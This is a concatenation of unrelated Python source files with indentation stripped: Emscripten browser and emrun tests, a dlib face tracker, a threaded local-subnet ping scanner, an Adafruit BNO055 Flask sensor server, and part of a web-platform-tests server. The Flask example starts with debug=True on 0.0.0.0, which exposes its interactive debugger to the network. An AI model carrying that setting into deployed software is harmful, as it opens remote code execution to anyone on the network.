for args in [[], ['-s', 'MINIMAL_RUNTIME']]:
self.compile_btest([test_file('small_hello_world.c'), '-s', 'WASM=2', '-o', 'test.html'] + args)
# Run without the .wasm.js file present: with Wasm support, the page should still run
os.rename('test.wasm.js', 'test.wasm.js.unused')
self.run_browser('test.html', 'hello!', '/report_result?0')
# Restore the .wasm.js file, then corrupt the .wasm file, that should trigger the Wasm2js fallback to run
os.rename('test.wasm.js.unused', 'test.wasm.js')
shutil.copyfile('test.js', 'test.wasm')
self.run_browser('test.html', 'hello!', '/report_result?0')
def test_system(self):
self.btest(test_file('system.c'), '0')
# Tests that it is possible to hook into/override a symbol defined in a system library.
@requires_graphics_hardware
def test_override_system_js_lib_symbol(self):
# This test verifies it is possible to override a symbol from WebGL library.
# When WebGL is implicitly linked in, the implicit linking should happen before any user --js-libraries, so that they can adjust
# the behavior afterwards.
self.btest(test_file('test_override_system_js_lib_symbol.c'),
expected='5121',
args=['--js-library', test_file('test_override_system_js_lib_symbol.js')])
# When WebGL is explicitly linked to in strict mode, the linking order on command line should enable overriding.
self.btest(test_file('test_override_system_js_lib_symbol.c'),
expected='5121',
args=['-s', 'AUTO_JS_LIBRARIES=0', '-lwebgl.js', '--js-library', test_file('test_override_system_js_lib_symbol.js')])
@no_firefox('no 4GB support yet')
def test_zzz_zzz_4gb(self):
# TODO Convert to an actual browser test when it reaches stable.
# For now, keep this in browser as this suite runs serially, which
# means we don't compete for memory with anything else (and run it
# at the very very end, to reduce the risk of it OOM-killing the
# browser).
# test that we can allocate in the 2-4GB range, if we enable growth and
# set the max appropriately
self.emcc_args += ['-O2', '-s', 'ALLOW_MEMORY_GROWTH', '-s', 'MAXIMUM_MEMORY=4GB']
self.do_run_in_out_file_test('browser', 'test_4GB.cpp', js_engines=[config.V8_ENGINE])
# Tests that emmalloc supports up to 4GB Wasm heaps.
@no_firefox('no 4GB support yet')
def test_zzz_zzz_emmalloc_4gb(self):
self.btest(test_file('mem_growth.cpp'),
expected='-65536', # == 4*1024*1024*1024 - 65536 casted to signed
args=['-s', 'MALLOC=emmalloc', '-s', 'ABORTING_MALLOC=0', '-s', 'ALLOW_MEMORY_GROWTH=1', '-s', 'MAXIMUM_MEMORY=4GB'])
# Test that it is possible to malloc() a huge 3GB memory block in 4GB mode using emmalloc.
# Also test emmalloc-memvalidate and emmalloc-memvalidate-verbose build configurations.
@no_firefox('no 4GB support yet')
def test_emmalloc_3GB(self):
def test(args):
self.btest(test_file('alloc_3gb.cpp'),
expected='0',
args=['-s', 'MAXIMUM_MEMORY=4GB', '-s', 'ALLOW_MEMORY_GROWTH=1'] + args)
test(['-s', 'MALLOC=emmalloc'])
test(['-s', 'MALLOC=emmalloc-debug'])
test(['-s', 'MALLOC=emmalloc-memvalidate'])
test(['-s', 'MALLOC=emmalloc-memvalidate-verbose'])
@no_firefox('no 4GB support yet')
def test_zzz_zzz_emmalloc_memgrowth(self, *args):
self.btest(test_file('browser', 'emmalloc_memgrowth.cpp'), expected='0', args=['-s', 'MALLOC=emmalloc', '-s', 'ALLOW_MEMORY_GROWTH=1', '-s', 'ABORTING_MALLOC=0', '-s', 'ASSERTIONS=2', '-s', 'MINIMAL_RUNTIME=1', '-s', 'MAXIMUM_MEMORY=4GB'])
@no_firefox('no 4GB support yet')
def test_zzz_zzz_2gb_fail(self):
# TODO Convert to an actual browser test when it reaches stable.
# For now, keep this in browser as this suite runs serially, which
# means we don't compete for memory with anything else (and run it
# at the very very end, to reduce the risk of it OOM-killing the
# browser).
# test that growth doesn't go beyond 2GB without the max being set for that,
# and that we can catch an allocation failure exception for that
self.emcc_args += ['-O2', '-s', 'ALLOW_MEMORY_GROWTH', '-s', 'MAXIMUM_MEMORY=2GB']
self.do_run_in_out_file_test('browser', 'test_2GB_fail.cpp', js_engines=[config.V8_ENGINE])
@no_firefox('no 4GB support yet')
def test_zzz_zzz_4gb_fail(self):
# TODO Convert to an actual browser test when it reaches stable.
# For now, keep this in browser as this suite runs serially, which
# means we don't compete for memory with anything else (and run it
# at the very very end, to reduce the risk of it OOM-killing the
# browser).
# test that we properly report an allocation error that would overflow over
# 4GB.
self.emcc_args += ['-O2', '-s', 'ALLOW_MEMORY_GROWTH', '-s', 'MAXIMUM_MEMORY=4GB', '-s', 'ABORTING_MALLOC=0']
self.do_run_in_out_file_test('browser', 'test_4GB_fail.cpp', js_engines=[config.V8_ENGINE])
@disabled("only run this manually, to test for race conditions")
@parameterized({
'normal': ([],),
'assertions': (['-s', 'ASSERTIONS'],)
})
@requires_threads
def test_manual_pthread_proxy_hammer(self, args):
# the specific symptom of the hang that was fixed is that the test hangs
# at some point, using 0% CPU. often that occured in 0-200 iterations, but
# you may want to adjust "ITERATIONS".
self.btest(test_file('pthread', 'test_pthread_proxy_hammer.cpp'),
expected='0',
args=['-s', 'USE_PTHREADS', '-O2', '-s', 'PROXY_TO_PTHREAD',
'-DITERATIONS=1024', '-g1'] + args,
timeout=10000,
# don't run this with the default extra_tries value, as this is
# *meant* to notice something random, a race condition.
extra_tries=0)
def test_assert_failure(self):
self.btest(test_file('browser', 'test_assert_failure.c'), 'abort:Assertion failed: false && "this is a test"')
EMRUN = path_from_root('emrun')
class emrun(RunnerCore):
def test_emrun_info(self):
if not has_browser():
self.skipTest('need a browser')
result = self.run_process([EMRUN, '--system_info', '--browser_info'], stdout=PIPE).stdout
assert 'CPU' in result
assert 'Browser' in result
assert 'Traceback' not in result
result = self.run_process([EMRUN, '--list_browsers'], stdout=PIPE).stdout
assert 'Traceback' not in result
def test_no_browser(self):
# Test --no_browser mode where we have to take care of launching the browser ourselves
# and then killing emrun when we are done.
if not has_browser():
self.skipTest('need a browser')
self.run_process([EMCC, test_file('test_emrun.c'), '--emrun', '-o', 'hello_world.html'])
proc = subprocess.Popen([EMRUN, '--no_browser', '.', '--port=3333'], stdout=PIPE)
try:
if EMTEST_BROWSER:
print('Starting browser')
browser_cmd = shlex.split(EMTEST_BROWSER)
browser = subprocess.Popen(browser_cmd + ['http://localhost:3333/hello_world.html'])
try:
while True:
stdout = proc.stdout.read()
if b'Dumping out file' in stdout:
break
finally:
print('Terminating browser')
browser.terminate()
browser.wait()
finally:
print('Terminating emrun server')
proc.terminate()
proc.wait()
def test_emrun(self):
self.run_process([EMCC, test_file('test_emrun.c'), '--emrun', '-o', 'hello_world.html'])
if not has_browser():
self.skipTest('need a browser')
# We cannot run emrun from the temp directory the suite will clean up afterwards, since the
# browser that is launched will have that directory as startup directory, and the browser will
# not close as part of the test, pinning down the cwd on Windows and it wouldn't be possible to
# delete it. Therefore switch away from that directory before launching.
os.chdir(path_from_root())
args_base = [EMRUN, '--timeout', '30', '--safe_firefox_profile',
'--kill_exit', '--port', '6939', '--verbose',
'--log_stdout', self.in_dir('stdout.txt'),
'--log_stderr', self.in_dir('stderr.txt')]
# Verify that trying to pass argument to the page without the `--` separator will
# generate an actionable error message
err = self.expect_fail(args_base + ['--foo'])
self.assertContained('error: unrecognized arguments: --foo', err)
self.assertContained('remember to add `--` between arguments', err)
if EMTEST_BROWSER is not None:
# If EMTEST_BROWSER carried command line arguments to pass to the browser,
# (e.g. "firefox -profile /path/to/foo") those can't be passed via emrun,
# so strip them out.
browser_cmd = shlex.split(EMTEST_BROWSER)
browser_path = browser_cmd[0]
args_base += ['--browser', browser_path]
if len(browser_cmd) > 1:
browser_args = browser_cmd[1:]
if 'firefox' in browser_path and ('-profile' in browser_args or '--profile' in browser_args):
# emrun uses its own -profile, strip it out
parser = argparse.ArgumentParser(add_help=False) # otherwise it throws with -headless
parser.add_argument('-profile')
parser.add_argument('--profile')
browser_args = parser.parse_known_args(browser_args)[1]
if browser_args:
args_base += ['--browser_args', ' ' + ' '.join(browser_args)]
for args in [
args_base,
args_base + ['--private_browsing', '--port', '6941']
]:
args += [self.in_dir('hello_world.html'), '--', '1', '2', '--3']
print(shared.shlex_join(args))
proc = self.run_process(args, check=False)
self.assertEqual(proc.returncode, 100)
stdout = open(self.in_dir('stdout.txt'), 'r').read()
stderr = open(self.in_dir('stderr.txt'), 'r').read()
self.assertContained('argc: 4', stdout)
self.assertContained('argv[3]: --3', stdout)
self.assertContained('hello, world!', stdout)
self.assertContained('Testing ASCII characters: !"$%&\'()*+,-./:;<=>?@[\\]^_`{|}~', stdout)
self.assertContained('Testing char sequences: %20%21 ä', stdout)
self.assertContained('hello, error stream!', stderr)
|
dlib_tracker.py
|
import multiprocessing as mp
import os
import queue
from statistics import median
import dlib
import numpy as np
class DlibTracker():
def __init__(self, face_detect_strategy=None):
try:
self._detect_proc = None
model_path = os.path.join(os.getcwd(), "res", "shape_predictor_68_face_landmarks.dat")
self._face_detector = dlib.get_frontal_face_detector()
self._pose_estimator = dlib.shape_predictor(model_path)
self._smoothed = {pt: ([], []) for pt in DlibTracker._dlib2mpeg4}
if face_detect_strategy is None:
face_detect_strategy = "smart"
self._fd_fast = face_detect_strategy != "brute"
self._fd_smart = face_detect_strategy == "smart"
if self._fd_fast:
self._last_detected_faces = []
self._work_queue = mp.Queue(1)
self._results_queue = mp.Queue(1)
self._detect_proc = mp.Process(target=self._detectFacesThreaded, name="dlib_tracker")
self._detect_proc.start()
except RuntimeError:
print("Please download and unzip "
"http://dlib.net/files/shape_predictor_68_face_landmarks.dat.bz2 into 'res' folder")
raise
@staticmethod
def __version__():
return dlib.__version__
def __del__(self):
self.stop()
def _detectFacesThreaded(self):
while True:
image = self._work_queue.get()
if image is None:
break
detected_faces = self._face_detector(image, 0)
try:
self._results_queue.put_nowait(detected_faces)
except queue.Full:
pass
def trackFaces(self, image, frameNumber, timeStamp_ms, searchRect=None, desiredAttributes=None):
x, y, w, h = self._sanitizeRoi(image.shape, searchRect)
searchImage = image[y:y + h, x:x + w]
if self._fd_fast:
try:
self._work_queue.put_nowait(np.copy(searchImage))
except queue.Full:
pass
try:
self._last_detected_faces = self._results_queue.get_nowait()
except queue.Empty:
pass
# Force face detection if the result was empty if using the "smart" strategy
if self._fd_smart and not self._last_detected_faces:
self._last_detected_faces = self._face_detector(searchImage, 0)
else:
self._last_detected_faces = self._face_detector(searchImage, 0)
face_rects = self._last_detected_faces
faces = {}
for i, rect in enumerate(face_rects):
face_points = self._pose_estimator(searchImage, rect)
points = {}
for j in range(face_points.num_parts):
# The 0 check is here is because Dlib will happily give you negative coordinates
# which the SDK obviously cannot handle
newx = face_points.part(j).x + x if face_points.part(j).x + x > 0 else 0
newy = face_points.part(j).y + y if face_points.part(j).y + y > 0 else 0
pointname = DlibTracker._dlib2mpeg4[j]
smoothedx, smoothedy = self._smoothPoints(newx, newy, pointname)
points[pointname] = {"x": smoothedx, "y": smoothedy, "valid": True, "estimated": True, "quality": 1.0}
faces[str(i)] = {
"id": str(i + 1),
"rect.x": rect.left() + x if rect.left() + x > 0 else 0,
"rect.y": rect.top() + y if rect.top() + y > 0 else 0,
"rect.w": rect.width(),
"rect.h": rect.height(),
"detected": True,
"poseValid": True if len(points) > 0 else False,
"points": points
}
return faces
def stop(self):
if self._detect_proc and self._detect_proc.is_alive():
self._work_queue.put(None)
self._detect_proc.terminate()
self._work_queue.cancel_join_thread()
self._results_queue.cancel_join_thread()
def _smoothPoints(self, newx, newy, pointname, framesToSmooth=10):
xs, ys = self._smoothed[pointname]
xs.append(newx)
ys.append(newy)
if len(xs) > framesToSmooth:
self._smoothed[pointname] = xs[1:], ys[1:]
smoothedx = median(xs)
smoothedy = median(ys)
return smoothedx, smoothedy
# TODO check this
def _sanitizeRoi(self, shape, rect=None):
if rect is None:
return (0, 0, shape[1] - 1, shape[0] - 1)
else:
x, y, w, h = rect
left = x if x > 0 else 0
top = y if y > 0 else 0
width = w if w > 0 and w < shape[1] else shape[1]
height = h if h > 0 and h < shape[0] else shape[0]
return (left, top, width, height)
# This is a class attribute
_dlib2mpeg4 = [
"13.2", # DLIB: 0
"13.4", # DLIB: 1
"13.6", # DLIB: 2
"13.8", # DLIB: 3
"13.10", # DLIB: 4
"13.12", # DLIB: 5
"13.14", # DLIB: 6
"13.16", # DLIB: 7
"13.17", # DLIB: 8
"13.15", # DLIB: 9
"13.13", # DLIB: 10
"13.11", # DLIB: 11
"13.9", # DLIB: 12
"13.7", # DLIB: 13
"13.5", # DLIB: 14
"13.3", # DLIB: 15
"13.1", # DLIB: 16
# left eye brow
"4.6", # DLIB: 17
"14.4", # DLIB: 18
"4.4", # DLIB: 19
"14.2", # DLIB: 20
"4.2", # DLIB: 21
# right eye brow
"4.1", # DLIB: 22
"14.1", # DLIB: 23
"4.3", # DLIB: 24
"14.3", # DLIB: 25
"4.5", # DLIB: 26
# nose bridge
"12.1", # DLIB: 27
"9.12", # DLIB: 28 -- This is a point that does not exist in Visage
"9.12", # DLIB: 29
"9.3", # DLIB: 30
# lower nose
"9.2", # DLIB: 31
"9.4", # DLIB: 32
"9.15", # DLIB: 33
"9.5", # DLIB: 34
"9.1", # DLIB: 35
# right eye relative to the user
"3.12", # DLIB: 36
"12.10", # DLIB: 37
"12.6", # DLIB: 38
"3.8", # DLIB: 39
"12.8", # DLIB: 40
"12.12", # DLIB: 41
# left eye relative to the user
"3.11", # DLIB: 42
"12.9", # DLIB: 43
"12.5", # DLIB: 44
"3.7", # DLIB: 45
"12.7", # DLIB: 46
"12.11", # DLIB: 47
# mouth
"8.4", # DLIB: 48
"8.6", # DLIB: 49
"8.9", # DLIB: 50
"8.1", # DLIB: 51
"8.10", # DLIB: 52
"8.5", # DLIB: 53
"8.3", # DLIB: 54
"8.7", # DLIB: 55 -- This is a point that does not exist in Visage, consider 8.8
"8.7", # DLIB: 56
"8.2", # DLIB: 57
"8.8", # DLIB: 58 -- This is a point that does not exist in Visage, consider 8.7
"8.8", # DLIB: 59
# mouth region
"2.5", # DLIB: 60
"2.7", # DLIB: 61
"2.2", # DLIB: 62
"2.6", # DLIB: 63
"2.4", # DLIB: 64
"2.8", # DLIB: 65
"2.3", # DLIB: 66
"2.9" # DLIB: 67
]
|
SearchDevices.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import ipaddress
import socket
import netifaces
import netaddr
import threading
import time
import platform
import sys
import os
MYPATH = os.path.dirname(__file__)
print("Module [SearchDevices] path: {} __package__: {} __name__: {} __file__: {}".format(
sys.path[0], __package__, __name__, MYPATH))
try:
from . import LocalMachine
CommandHandler = LocalMachine.CommandHandler
except Exception as e:
print("Import warning __name__:{}: {}".format(__name__, e))
sys.path.append(MYPATH)
from LocalMachine import CommandHandler
print("Module [SearchDevices] path: {} __package__: {} __name__: {}".format(sys.path[0], __package__, __name__))
try:
from . import LocalMachine
CommandHandler = LocalMachine.CommandHandler
except Exception as e:
print("Import warning __name__:{}: {}".format(__name__, e))
sys.path.append(sys.path[0])
from LocalMachine import CommandHandler
AVAILABLE_DEVICES_LIST = []
def add_element_to_list(element):
global AVAILABLE_DEVICES_LIST
if element not in AVAILABLE_DEVICES_LIST:
AVAILABLE_DEVICES_LIST.append(element)
def get_all_hosts(net, subnet=24):
"""
Generate network range list for scanning
"""
# Prompt the user to input a network address
net_addr = '{net}/{subnet}'.format(net=net, subnet=subnet)
# Create the network
ip_net = ipaddress.ip_network(net_addr)
# Get all hosts on that network
all_hosts = list(ip_net.hosts())
return all_hosts[1:-1]
def my_local_ip():
"""
Get local machine local IP
"""
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
local_ip = s.getsockname()[0]
s.close()
return local_ip
def gateway_ip():
"""
Get router IP
"""
gws = netifaces.gateways()
return list(gws['default'].values())[0][0]
def guess_net_address(gateway_ip, subnet=24):
"""
Determine network IP
"""
ip = netaddr.IPNetwork('{gw_ip}/{subnet}'.format(gw_ip=gateway_ip, subnet=subnet))
return ip.network
def __worker_filter_online_devices(host_list, port, thname="main"):
"""
Get online devices from network range
"""
global AVAILABLE_DEVICES_LIST
for host in host_list:
host = str(host)
command = "ping {ip} -n 1".format(ip=host) if platform.system().lower()=='windows' else "ping -c 1 -p {port} {ip}".format( port=port, ip=host)
exitcode, stdout, stderr = CommandHandler.run_command(command, shell=True)
if exitcode == 0 and 'unreachable' not in stdout.lower():
print("[{}] ONLINE: {}".format(thname, host))
add_element_to_list(host)
else:
print("[{}] OFFLINE: {}".format(thname, host))
def filter_threads(host_list, port, threads=80):
"""
Use threads for parallel network scanning
"""
thread_instance_list = []
range_size = len(host_list) / threads
for cnt in range(1, threads+1):
start_index = round((cnt-1)*range_size)
end_index = round(cnt*range_size)
#print("RANGE: {} - {}".format(start_index, end_index))
host_range = host_list[start_index:end_index]
thread_name = "thread-{}-[{}-{}]".format(cnt, start_index, end_index)
thread_instance_list.append(
threading.Thread(target=__worker_filter_online_devices, args=(host_range, port, thread_name,))
)
for mythread in thread_instance_list:
mythread.start()
for mythread in thread_instance_list:
mythread.join()
print("{} device was found: {}".format(len(AVAILABLE_DEVICES_LIST), AVAILABLE_DEVICES_LIST))
return AVAILABLE_DEVICES_LIST
def online_device_scanner(service_port=9008):
start_time = time.time()
gw_ip = gateway_ip()
net_ip = guess_net_address(gw_ip)
all_hosts_in_net_list = get_all_hosts(net_ip)
online_devices = filter_threads(all_hosts_in_net_list, port=service_port)
end_time = time.time()
print("Elapsed time: {}".format(end_time - start_time))
return online_devices
def node_is_online(ip, port=9008):
cmd_base = 'ping -c 1 -p {port} {ip}'
cmd = cmd_base.format(port=port, ip=ip)
exitcode, stdout, stderr = LocalMachine.CommandHandler.run_command(cmd, shell=True, debug=False)
if exitcode == 0 and len(stderr.strip()) == 0:
return True
else:
return False
if __name__ == "__main__":
online_device_scanner()
|
server.py
|
# SPDX-FileCopyrightText: 2015 Tony DiCola for Adafruit Industries
# SPDX-FileCopyrightText: 2019 Carter Nelson for Adafruit Industries
# SPDX-License-Identifier: MIT
# Adafruit BNO055 WebGL Example
#
# Requires the flask web framework to be installed. See http://flask.pocoo.org/
# for installation instructions, however on a Linux machine like the Raspberry
# Pi or BeagleBone black you can likely install it by running:
# sudo apt-get update
# sudo apt-get install python3-flask
#
# Author: Tony DiCola
# 2019 update: Carter Nelson
import json
import threading
import time
import board
import busio
import flask
import adafruit_bno055
i2c = busio.I2C(board.SCL, board.SDA)
# Create the BNO sensor connection.
bno = adafruit_bno055.BNO055_I2C(i2c)
# Application configuration below. You probably don't need to change these values.
# How often to update the BNO sensor data (in hertz).
BNO_UPDATE_FREQUENCY_HZ = 10
# Name of the file to store calibration data when the save/load calibration
# button is pressed. Calibration data is stored in JSON format.
CALIBRATION_FILE = "calibration.json"
# BNO sensor axes remap values. These are the parameters to the BNO.set_axis_remap
# function. Don't change these without consulting section 3.4 of the datasheet.
# The default axes mapping below assumes the Adafruit BNO055 breakout is flat on
# a table with the row of SDA, SCL, GND, VIN, etc pins facing away from you.
# BNO_AXIS_REMAP = { 'x': BNO055.AXIS_REMAP_X,
# 'y': BNO055.AXIS_REMAP_Z,
# 'z': BNO055.AXIS_REMAP_Y,
# 'x_sign': BNO055.AXIS_REMAP_POSITIVE,
# 'y_sign': BNO055.AXIS_REMAP_POSITIVE,
# 'z_sign': BNO055.AXIS_REMAP_NEGATIVE }
# Create flask application.
app = flask.Flask(__name__)
# Global state to keep track of the latest readings from the BNO055 sensor.
# This will be accessed from multiple threads so care needs to be taken to
# protect access with a lock (or else inconsistent/partial results might be read).
# A condition object is used both as a lock for safe access across threads, and
# to notify threads that the BNO state has changed.
bno_data = {}
bno_changed = threading.Condition()
# Background thread to read BNO sensor data. Will be created right before
# the first request is served (see start_bno_thread below).
bno_thread = None
def read_bno():
"""Function to read the BNO sensor and update the bno_data object with the
latest BNO orientation, etc. state. Must be run in its own thread because
it will never return!
"""
while True:
# Capture the lock on the bno_changed condition so the bno_data shared
# state can be updated.
with bno_changed:
bno_data["euler"] = bno.euler
bno_data["temp"] = bno.temperature
bno_data["quaternion"] = bno.quaternion
bno_data["calibration"] = bno.calibration_status
# Notify any waiting threads that the BNO state has been updated.
bno_changed.notify_all()
# Sleep until the next reading.
time.sleep(1.0 / BNO_UPDATE_FREQUENCY_HZ)
def bno_sse():
"""Function to handle sending BNO055 sensor data to the client web browser
using HTML5 server sent events (aka server push). This is a generator function
that flask will run in a thread and call to get new data that is pushed to
the client web page.
"""
# Loop forever waiting for a new BNO055 sensor reading and sending it to
# the client. Since this is a generator function the yield statement is
# used to return a new result.
while True:
# Capture the bno_changed condition lock and then wait for it to notify
# a new reading is available.
with bno_changed:
bno_changed.wait()
# A new reading is available! Grab the reading value and then give
# up the lock.
heading, roll, pitch = bno_data["euler"]
temp = bno_data["temp"]
x, y, z, w = bno_data["quaternion"]
sys, gyro, accel, mag = bno_data["calibration"]
# Send the data to the connected client in HTML5 server sent event format.
data = {
"heading": heading,
"roll": roll,
"pitch": pitch,
"temp": temp,
"quatX": x,
"quatY": y,
"quatZ": z,
"quatW": w,
"calSys": sys,
"calGyro": gyro,
"calAccel": accel,
"calMag": mag,
}
yield "data: {0}\n\n".format(json.dumps(data))
@app.before_first_request
def start_bno_thread():
# Start the BNO thread right before the first request is served. This is
# necessary because in debug mode flask will start multiple main threads so
# this is the only spot to put code that can only run once after starting.
# See this SO question for more context:
# http://stackoverflow.com/questions/24617795/starting-thread-while-running-flask-with-debug
global bno_thread # pylint: disable=global-statement
# Kick off BNO055 reading thread.
bno_thread = threading.Thread(target=read_bno)
bno_thread.daemon = True # Don't let the BNO reading thread block exiting.
bno_thread.start()
@app.route("/bno")
def bno_path():
# Return SSE response and call bno_sse function to stream sensor data to
# the webpage.
return flask.Response(bno_sse(), mimetype="text/event-stream")
@app.route("/save_calibration", methods=["POST"])
def save_calibration():
# Save calibration data to disk.
#
# TODO: implement this
#
return "OK"
@app.route("/load_calibration", methods=["POST"])
def load_calibration():
# Load calibration from disk.
#
# TODO: implement this
#
return "OK"
@app.route("/")
def root():
return flask.render_template("index.html")
if __name__ == "__main__":
# Create a server listening for external connections on the default
# port 5000. Enable debug mode for better error messages and live
# reloading of the server on changes. Also make the server threaded
# so multiple connections can be processed at once (very important
# for using server sent events).
app.run(host="0.0.0.0", debug=True, threaded=True)
|
serve.py
|
# -*- coding: utf-8 -*-
from __future__ import print_function
import abc
import argparse
import json
import logging
import os
import platform
import signal
import socket
import subprocess
import sys
import threading
import time
import traceback
from six.moves import urllib
import uuid
from collections import defaultdict, OrderedDict
from itertools import chain, product
from multiprocessing import Process, Event
from localpaths import repo_root
from six.moves import reload_module
from manifest.sourcefile import read_script_metadata, js_meta_re, parse_variants
from wptserve import server as wptserve, handlers
from wptserve import stash
from wptserve import config
from wptserve.logger import set_logger
from wptserve.handlers import filesystem_path, wrap_pipeline
from wptserve.utils import get_port, HTTPException, http2_compatible
from mod_pywebsocket import standalone as pywebsocket
EDIT_HOSTS_HELP = ("Please ensure all the necessary WPT subdomains "
"are mapped to a loopback device in /etc/hosts.\n"
"See https://web-platform-tests.org/running-tests/from-local-system.html#system-setup "
"for instructions.")
def replace_end(s, old, new):
"""
Given a string `s` that ends with `old`, replace that occurrence of `old`
with `new`.
"""
assert s.endswith(old)
return s[:-len(old)] + new
def domains_are_distinct(a, b):
a_parts = a.split(".")
b_parts = b.split(".")
min_length = min(len(a_parts), len(b_parts))
slice_index = -1 * min_length
return a_parts[slice_index:] != b_parts[slice_index:]
class WrapperHandler(object):
__meta__ = abc.ABCMeta
headers = []
def __init__(self, base_path=None, url_base="/"):
self.base_path = base_path
self.url_base = url_base
self.handler = handlers.handler(self.handle_request)
def __call__(self, request, response):
self.handler(request, response)
def handle_request(self, request, response):
for header_name, header_value in self.headers:
response.headers.set(header_name, header_value)
self.check_exposure(request)
path = self._get_path(request.url_parts.path, True)
query = request.url_parts.query
if query:
query = "?" + query
meta = "\n".join(self._get_meta(request))
script = "\n".join(self._get_script(request))
response.content = self.wrapper % {"meta": meta, "script": script, "path": path, "query": query}
wrap_pipeline(path, request, response)
def _get_path(self, path, resource_path):
"""Convert the path from an incoming request into a path corresponding to an "unwrapped"
resource e.g. the file on disk that will be loaded in the wrapper.
:param path: Path from the HTTP request
:param resource_path: Boolean used to control whether to get the path for the resource that
this wrapper will load or the associated file on disk.
Typically these are the same but may differ when there are multiple
layers of wrapping e.g. for a .any.worker.html input the underlying disk file is
.any.js but the top level html file loads a resource with a
.any.worker.js extension, which itself loads the .any.js file.
If True return the path to the resource that the wrapper will load,
otherwise return the path to the underlying file on disk."""
for item in self.path_replace:
if len(item) == 2:
src, dest = item
else:
assert len(item) == 3
src = item[0]
dest = item[2 if resource_path else 1]
if path.endswith(src):
path = replace_end(path, src, dest)
return path
def _get_metadata(self, request):
"""Get an iterator over script metadata based on // META comments in the
associated js file.
:param request: The Request being processed.
"""
path = self._get_path(filesystem_path(self.base_path, request, self.url_base), False)
try:
with open(path, "rb") as f:
for key, value in read_script_metadata(f, js_meta_re):
yield key, value
except IOError:
raise HTTPException(404)
def _get_meta(self, request):
"""Get an iterator over strings to inject into the wrapper document
based on // META comments in the associated js file.
:param request: The Request being processed.
"""
for key, value in self._get_metadata(request):
replacement = self._meta_replacement(key, value)
if replacement:
yield replacement
def _get_script(self, request):
"""Get an iterator over strings to inject into the wrapper document
based on // META comments in the associated js file.
:param request: The Request being processed.
"""
for key, value in self._get_metadata(request):
replacement = self._script_replacement(key, value)
if replacement:
yield replacement
@abc.abstractproperty
def path_replace(self):
# A list containing a mix of 2 item tuples with (input suffix, output suffix)
# and 3-item tuples with (input suffix, filesystem suffix, resource suffix)
# for the case where we want a different path in the generated resource to
# the actual path on the filesystem (e.g. when there is another handler
# that will wrap the file).
return None
@abc.abstractproperty
def wrapper(self):
# String template with variables path and meta for wrapper document
return None
@abc.abstractmethod
def _meta_replacement(self, key, value):
# Get the string to insert into the wrapper document, given
# a specific metadata key: value pair.
pass
@abc.abstractmethod
def check_exposure(self, request):
# Raise an exception if this handler shouldn't be exposed after all.
pass
class HtmlWrapperHandler(WrapperHandler):
global_type = None
headers = [('Content-Type', 'text/html')]
def check_exposure(self, request):
if self.global_type:
globals = u""
for (key, value) in self._get_metadata(request):
if key == "global":
globals = value
break
if self.global_type not in parse_variants(globals):
raise HTTPException(404, "This test cannot be loaded in %s mode" %
self.global_type)
def _meta_replacement(self, key, value):
if key == "timeout":
if value == "long":
return '<meta name="timeout" content="long">'
if key == "title":
value = value.replace("&", "&").replace("<", "<")
return '<title>%s</title>' % value
return None
def _script_replacement(self, key, value):
if key == "script":
attribute = value.replace("&", "&").replace('"', """)
return '<script src="%s"></script>' % attribute
return None
class WorkersHandler(HtmlWrapperHandler):
global_type = "dedicatedworker"
path_replace = [(".any.worker.html", ".any.js", ".any.worker.js"),
(".worker.html", ".worker.js")]
wrapper = """<!doctype html>
<meta charset=utf-8>
%(meta)s
<script src="/resources/testharness.js"></script>
<script src="/resources/testharnessreport.js"></script>
<div id=log></div>
<script>
fetch_tests_from_worker(new Worker("%(path)s%(query)s"));
</script>
"""
class WindowHandler(HtmlWrapperHandler):
path_replace = [(".window.html", ".window.js")]
wrapper = """<!doctype html>
<meta charset=utf-8>
%(meta)s
<script src="/resources/testharness.js"></script>
<script src="/resources/testharnessreport.js"></script>
%(script)s
<div id=log></div>
<script src="%(path)s"></script>
"""
class AnyHtmlHandler(HtmlWrapperHandler):
global_type = "window"
path_replace = [(".any.html", ".any.js")]
wrapper = """<!doctype html>
<meta charset=utf-8>
%(meta)s
<script>
self.GLOBAL = {
isWindow: function() { return true; },
isWorker: function() { return false; },
};
</script>
<script src="/resources/testharness.js"></script>
<script src="/resources/testharnessreport.js"></script>
%(script)s
<div id=log></div>
<script src="%(path)s"></script>
"""
class SharedWorkersHandler(HtmlWrapperHandler):
global_type = "sharedworker"
path_replace = [(".any.sharedworker.html", ".any.js", ".any.worker.js")]
wrapper = """<!doctype html>
<meta charset=utf-8>
%(meta)s
<script src="/resources/testharness.js"></script>
<script src="/resources/testharnessreport.js"></script>
<div id=log></div>
<script>
fetch_tests_from_worker(new SharedWorker("%(path)s%(query)s"));
</script>
"""
class ServiceWorkersHandler(HtmlWrapperHandler):
global_type = "serviceworker"
path_replace = [(".any.serviceworker.html", ".any.js", ".any.worker.js")]
wrapper = """<!doctype html>
<meta charset=utf-8>
%(meta)s
<script src="/resources/testharness.js"></script>
<script src="/resources/testharnessreport.js"></script>
<div id=log></div>
<script>
(async function() {
const scope = 'does/not/exist';
let reg = await navigator.serviceWorker.getRegistration(scope);
if (reg) await reg.unregister();
reg = await navigator.serviceWorker.register("%(path)s%(query)s", {scope});
fetch_tests_from_worker(reg.installing);
})();
</script>
"""
class AnyWorkerHandler(WrapperHandler):
headers = [('Content-Type', 'text/javascript')]
path_replace = [(".any.worker.js", ".any.js")]
wrapper = """%(meta)s
self.GLOBAL = {
isWindow: function() { return false; },
isWorker: function() { return true; },
};
importScripts("/resources/testharness.js");
%(script)s
importScripts("%(path)s");
done();
"""
def _meta_replacement(self, key, value):
return None
def _script_replacement(self, key, value):
if key == "script":
attribute = value.replace("\\", "\\\\").replace('"', '\\"')
return 'importScripts("%s")' % attribute
if key == "title":
value = value.replace("\\", "\\\\").replace('"', '\\"')
return 'self.META_TITLE = "%s";' % value
return None
rewrites = [("GET", "/resources/WebIDLParser.js", "/resources/webidl2/lib/webidl2.js")]
class RoutesBuilder(object):
def __init__(self):
self.forbidden_override = [("GET", "/tools/runner/*", handlers.file_handler),
("POST", "/tools/runner/update_manifest.py",
handlers.python_script_handler)]
self.forbidden = [("*", "/_certs/*", handlers.ErrorHandler(404)),
("*", "/tools/*", handlers.ErrorHandler(404)),
("*", "{spec}/tools/*", handlers.ErrorHandler(404)),
("*", "/results/", handlers.ErrorHandler(404))]
self.extra = []
self.mountpoint_routes = OrderedDict()
self.add_mount_point("/", None)
def get_routes(self):
routes = self.forbidden_override + self.forbidden + self.extra
